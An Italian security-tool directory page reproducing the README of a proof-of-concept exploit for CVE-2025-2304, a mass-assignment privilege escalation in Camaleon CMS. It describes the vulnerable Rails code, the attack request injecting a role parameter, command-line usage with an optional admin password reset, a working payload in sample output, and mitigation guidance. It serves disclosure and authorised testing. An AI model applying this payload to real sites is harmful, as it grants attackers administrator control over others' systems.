Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Escalation di PrivilegiGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Proof-of-concept per CVE-2025-2304 — escalation di privilegi critica (CVSS 9.4) tramite mass-assignment in Camaleon CMS.

Vedi Repository
10344 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-2304 PoC - Escalation dei privilegi in Camaleon CMS

CVE CVSS Python License

Un exploit Proof of Concept (PoC) per CVE-2025-2304, una vulnerabilità critica di mass assignment in Camaleon CMS che consente l'escalation dei privilegi da utenti con privilegi bassi ad amministratori.

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Sommario

  • Panoramica
  • Dettagli della vulnerabilità
  • Funzionalità
  • Installazione
  • Utilizzo
  • Esempi
  • Versioni interessate
  • Mitigazione
  • Disclaimer
  • Riferimenti
  • Autore

🔍 Panoramica

CVE-2025-2304 è una vulnerabilità critica di mass assignment in Camaleon CMS presente nel metodo updated_ajax del UsersController. La vulnerabilità deriva dall'uso del pericoloso metodo permit! in Rails, che consente il passaggio di tutti i parametri senza alcun filtro.

Questo PoC dimostra come un utente autenticato con privilegi bassi possa scalare al ruolo di amministratore iniettando parametri non autorizzati durante le operazioni di cambio password.

Punteggio CVSS: 9.4 (Critico)

🐛 Dettagli della vulnerabilità

Causa principale

Il codice vulnerabile utilizza params.require(:user).permit! che accetta tutti i parametri forniti dall'utente senza validazione:

root@kitploit:~
def updated_ajax
  user_params = params.require(:user).permit!  # DANGEROUS!
  current_user.update(user_params)
end

Sfruttamento

Un attaccante può iniettare parametri aggiuntivi come user[role]=admin insieme ai legittimi campi di cambio password, facendo sì che l'applicazione aggiorni il ruolo dell'utente ad amministratore.

Vettore d'attacco:

  1. Autenticarsi come utente con privilegi bassi (es. ruolo "client")
  2. Inviare una richiesta POST appositamente modificata a /admin/users/{id}/updated_ajax
  3. Iniettare il parametro user[role]=admin
  4. Il ruolo dell'utente scala ad amministratore

✨ Funzionalità

  • ✅ Test Sicuro: Preserva la password dell'utente durante lo sfruttamento
  • ✅ Payload Multipli: Testa 7+ diverse tecniche di iniezione
  • ✅ Rilevamento Versione: Rileva automaticamente le versioni vulnerabili del CMS
  • ✅ Opzione Non Distruttiva: flag --no-password-field per test più sicuri
  • ✅ Supporto Proxy: Si integra con Burp Suite/ZAP per l'analisi manuale
  • ✅ Modalità Verbose: Output dettagliato per il debug
  • ✅ Admin Takeover: Attacco opzionale di reset della password dell'amministratore
  • ✅ Output Colorato: Indicatori visivi chiari per successo/fallimento

📦 Installazione

Requisiti

  • Python 3.7+
  • pip (gestore di pacchetti Python)

Clonare il repository

root@kitploit:~
git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Installare le dipendenze

root@kitploit:~
pip install -r requirements.txt

Oppure installare manualmente:

root@kitploit:~
pip install requests beautifulsoup4

🚀 Utilizzo

Sintassi di base

root@kitploit:~
python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Opzioni della riga di comando

root@kitploit:~
positional arguments:
  target                Target URL (e.g., http://target.com)

required arguments:
  -u, --username        Existing username for authentication
  -p, --password        User password

optional arguments:
  -h, --help            Show help message and exit
  -v, --verbose         Verbose output (show all requests)
  --proxy PROXY         HTTP proxy for traffic inspection (e.g., http://127.0.0.1:8080)
  --no-password-field   Test exploitation without password fields (safest)
  --skip-admin-test     Skip destructive admin password reset test

📚 Esempi

Test standard (consigliato)

Test con le credenziali di un utente esistente preservando la password:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Test più sicuro (senza campi password)

Test senza includere i campi password nel payload dello sfruttamento:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Con proxy Burp Suite

Instrada il traffico attraverso Burp Suite per l'ispezione manuale:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Modalità verbose

Abilita l'output dettagliato mostrando tutte le richieste e risposte:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Salta i test distruttivi

Testa solo l'escalation dei privilegi, salta il reset della password dell'amministratore:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Esempio di output

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 Versioni interessate

VersioneStato
< 2.9.1❌ Vulnerabile
≥ 2.9.1✅ Corretta

Nello specifico vulnerabili:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x e versioni precedenti

🛡️ Mitigazione

Azioni immediate

  1. Aggiornare alla versione 2.9.1 o successiva

    root@kitploit:~
    gem update camaleon_cms
    
  2. Controllare gli account utente

    • Verificare cambi di privilegi inattesi
    • Esaminare i log delle modifiche ai ruoli utente
    • Cercare richieste POST sospette verso /users/*/updated_ajax
  3. Imporre il reset delle password (se compromessi)

    • Reimpostare le password di tutti gli account privilegiati
    • Invalidare le sessioni esistenti

Prevenzione a lungo termine

Pattern di codice sicuro:

Sostituire il pericoloso permit! con una whitelist esplicita:

root@kitploit:~
# Before (VULNERABLE)
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end

# After (SECURE)
def updated_ajax
  user_params = params.require(:user).permit(:password, :password_confirmation)
  current_user.update(user_params)
end

Misure di sicurezza aggiuntive:

  • Implementare un forte filtraggio dei parametri in tutta l'applicazione
  • Aggiungere flussi di approvazione per i cambi di ruolo nelle operazioni critiche
  • Abilitare la registrazione di audit per i cambi di privilegio
  • Applicare il principio del minimo privilegio
  • Monitorare i tentativi di mass assignment tramite regole WAF

⚠️ Disclaimer

Questo strumento è fornito solo per scopi educativi e di test di sicurezza autorizzati.

Nota legale:

  • Utilizzare questo strumento solo su sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione scritta ai test
  • L'accesso non autorizzato a sistemi informatici è illegale ai sensi di leggi quali:
    • Computer Fraud and Abuse Act (CFAA) negli Stati Uniti
    • Computer Misuse Act 1990 nel Regno Unito
    • Legislazione similare in altre giurisdizioni
  • L'autore non si assume ALCUNA responsabilità per l'uso improprio o i danni causati da questo strumento
  • Gli utenti sono gli unici responsabili delle proprie azioni

Uso etico:

  • Ottenere la dovuta autorizzazione prima di testare
  • Seguire le pratiche di responsible disclosure
  • Utilizzare in attività di penetration testing con approvazione del perimetro
  • Solo per scopi educativi in ambienti di laboratorio controllati

📖 Riferimenti

  • Voce CVE: CVE-2025-2304
  • Avviso GHSA: GHSA-rp28-mvq3-wf8j
  • Avviso del fornitore: Tenable Security Research TRA-2025-09
  • Commit di patch: GitHub Commit 179fd6b
  • Note di rilascio: Camaleon CMS 2.9.1

👤 Autore

d3vn0mi

  • GitHub: @d3vn0mi
  • Sito personale: @d3vn0mi
  • Blog personale: @d3vn0mi

📝 Licenza

Questo progetto è distribuito con licenza MIT - vedi il file LICENSE per i dettagli.

🤝 Contributi

Contributi, segnalazioni di problemi e richieste di funzionalità sono benvenuti!

Sentiti libero di consultare la pagina delle issue.

⭐ Mostra il tuo supporto

Lascia una ⭐️ se questo progetto ti è stato utile!


Nota: Questo repository è a scopo di ricerca sulla sicurezza e didattico. Pratica sempre la responsible disclosure e ottieni la dovuta autorizzazione prima di testare.

Scarica lo strumento